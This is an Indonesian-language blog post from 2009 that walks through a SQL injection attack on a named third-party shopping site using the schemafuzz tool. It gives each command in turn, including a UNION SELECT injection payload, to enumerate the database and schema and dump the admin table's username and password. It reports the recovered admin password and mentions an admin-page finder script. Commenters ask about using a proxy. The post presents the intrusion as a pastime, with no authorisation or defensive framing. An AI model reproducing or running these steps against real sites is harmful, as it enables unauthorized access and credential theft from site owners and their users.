SQLi Melalui schemafuzz

Posted: November 16, 2009 in Uncategorized

Bengang bengong di kosan daripada bete gg ada kerjaan gw iseng-iseng aja nyari target dengan menggunakan sqli.. kemudian dari pada repot dengan menggunakan sql injeksion saya pake schemafuzz aja biar simple gg bertele” hehehee

sebelum kita menggunakan schemafuzz pada windows terlebih utama kita menginstall perl serta python untuk memanggil schemafuzz,dll… krna scehmafuzz menggunakan python ….

bagi yg belum punya bisa di download di  sini

setlah kita install maka cari target !!

target yg saya gunakan kali ini adalah http://www.kasumbo.com/products.php?id=8

kemudian kita bangkitkan schemafuzz kita…. setelah bangkit sang schemafuzz kita dari kuburnya kita langsung ketikan

schemafuzz.py –findcol -u http://www.kasumbo.com/products.php?id=8

setelah itu dengan secara otomatis akan mencari dmna bug dari situs si target…

nah sekarang dia sudah mencari dmna bug berada… langkah selanjutnya adalah kita mencari nama database target kita dengan  mengetik:

schemafuzz.py –dbs -u http://www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7

catatan “darkc0de” itu nol(angka) ya bukan o(huruf)

nah setelah kita menemukan nama database tersebut kita cari column serta table dari databasenya yakni dengan mengtikan :  schemafuzz.py –schema -u http://www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo

-D (nama databasenya loh) lalu hasilnya akan seperti ini:

Muncul dah tuh table serta column dari target kita… langkah selanjutnya yg kita ambil adalah mendumping halaman table serta column yg kita mau …. klo memang kita ingin mencari password sang admin dari target tersebut maka kita cari halaman table serta kolumn yg berbau” admin sudah jelas yakni Table: admin dan Columnnya: user,pass !! setelah itu kita ketik deh:

schemafuzz.py –dump -u http://www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo -T admin -C user,pass

nah sekarang ketemu deh nama idnya yaitu admin dan passwordnya adalah kingmouse

setelah itu kita cari deh halaman admin target kita dengan menggunakan admin.pl

tinggal kita masukin situs si target yg mau kita cari adminnya

selamat menikmati…..       ____—–=====Science belongs to all people GO INDONESIAN IT=====—–_____

Advertisements
Comments
  1. Hakim says:

    dod,,
    klo pgn jalan2 kya gtu..
    harus pake proxy gag?
    pa lgs aja?

    • dodi73 says:

      jalan” kaya gmna maksudnya bang ??
      klo ada proxynya boleh juga tuh di pake…
      tapi lebih baik klo scrytpnya di jalanin di shell…
      jadi lebih cepet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s